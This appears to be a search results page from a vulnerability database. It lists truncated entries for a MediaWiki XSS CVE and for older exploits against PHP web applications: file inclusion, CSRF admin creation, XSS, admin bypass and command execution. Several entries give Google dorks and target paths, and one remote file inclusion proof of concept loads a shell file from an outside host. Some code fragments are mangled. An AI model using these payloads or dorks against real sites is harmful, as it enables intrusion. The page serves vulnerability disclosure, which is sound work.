17 matches found
CVE-2021-42043
An issue was discovered in Special:MediaSearch in the MediaSearch extension in MediaWiki through 1.36.2. The suggestion text a parameter to mediasearch-did-you-mean was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the intitle: search operator...
CVE-2021-42043
An issue was discovered in Special:MediaSearch in the MediaSearch extension in MediaWiki through 1.36.2. The suggestion text a parameter to mediasearch-did-you-mean was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the intitle: search operator...
PT-2021-23482 · Mediawiki +2 · Mediawiki +2
Name of the Vulnerable Software and Affected Versions: MediaWiki versions through 1.36.2 MediaSearch extension versions through 1.36.2 Description: An issue was discovered in Special:MediaSearch in the MediaSearch extension. The suggestion text, a parameter to mediasearch-did-you-mean, was not...
jax formmailer 3.0.0 - Remote File Inclusion Vulnerability
No description provided by source. --:remote file include:-- --------------------------------- script:Jax FormMailer 3.0.0 Release:01.06.2008 - Author: ahmadbady ----------------------------------------------------------------------- download...
X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)
Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" Date: 09.05.2012 Author: DennSpec Software Link: http://x7chat.com/releases/v2/x7chat2051.zip Version: Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace...
aspcms Station system injection 0day-vulnerability warning-the black bar safety net
aspcms development of the new core open source enterprise built Station system, capable of enterprise a variety of site requirements, and Support template customization, support, extensions, etc., can be completed in a short time the enterprise built Station. Vulnerability file:/plug/productbuy...
WESPA PHP Newsletter 3.0 Administrator Password Change
"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install path Author: alieye class : remote E-mail: [email protected] greetz: C.S.Eye Security Team members We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety & All Iranian Hackers Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com...
phpBazar Administrative Disclosure
===================================== phpBazar admin path discloser Vulnerability ===================================== Author :: NetSpy Group :: Aras cyber Army Email :: [email protected] Discover :: 1 july 2010 Critical Lvl :: M Publised :: 22 june 2010 vender :: n/a...
VRNews 1.1.1 - admin.php Remote Security Bypass
VRNews 1.1.1 - admin.php Remote Security Bypass VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3...
jGallery 1.3 - 'index.php' Remote File Inclusion
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Y! Underground Team + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-...
bj-xss.txt
BJ Webring XSS By : sn0oPy Risk : high exploit : just inject any script on the add link menu : http://www.target.ma/webring/formulaire.php Dork : intitle:".: index webring :." contact : [email protected] greetz : subzero, http://forums.avenir-geopolitique.net. reference :...
Ezboo webstats acces to sensitive files
Ezboo webstats acces to sensitive files By : sn0oPy Risk : medium site : http://www.ezboo.com/softs exploit : juste add this files to the url : http://www.target.ma/ezwebstats/update.php http://www.target.ma/ezwebstats/config.php Dork : inurl:"/ezWebStats/" intitle:"ezBOO WebStats" contact :...
Cacti <= 0.8.6i cmd.php popen() Remote Injection Exploit
Exploit for unknown platform in category web applications ======================================================== Cacti 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".deche...
PHPGraphy 0.9.12 Privilege Escalation / Commands Execution Exploit
No description provided by source. ?php printr' --------------------------------------------------------------------------- PHPGraphy 0.9.12 ZendHashDelKeyOrIndex/privilege escalation/ /remote command execution exploit by rgod dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy...
Google advanced techniques—GooGle Hack-vulnerability warning-the black bar safety net
google hacking is actually not anything new,at the time did not pay attention to this technology,think of webshell or something,and without too much practical use. google hacking is not so simple... Commonly used google keyword: foo1 foo2 which is associated, such as search xx company xx beauty...
Tagger v3 <= BBCodeFile Remote file inclusion
Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...
iGENUS WebMail 2.0.2 - config_inc.php Remote Code Execution
iGENUS WebMail 2.0.2 - configinc.php Remote Code Execution !/usr/bin/perl use IO::Socket; print "\r\n"; print "iGENUS WebMail works against PHP5 with registerglobals = On\r\n"; print " & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site:...